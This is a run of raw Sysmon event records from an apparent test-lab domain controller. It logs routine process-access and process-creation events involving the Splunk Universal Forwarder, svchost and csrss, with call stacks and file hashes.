13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85D0-5FCF-0001-000000009101}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.684{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D0-5FCF-0001-000000009101}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:28.685{10ACEC4A-85D0-5FCF-0001-000000009101}4244C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006720Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.683{10ACEC4A-85D1-5FCF-0101-000000009101}33764612C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006719Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D1-5FCF-0101-000000009101}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006718Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006717Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006716Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006715Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006714Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006713Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006712Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006711Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006710Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85D1-5FCF-0101-000000009101}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85D1-5FCF-0101-000000009101}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:29.543{10ACEC4A-85D1-5FCF-0101-000000009101}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-85D2-5FCF-0201-000000009101}3864C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006731Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:30.448{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006730Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 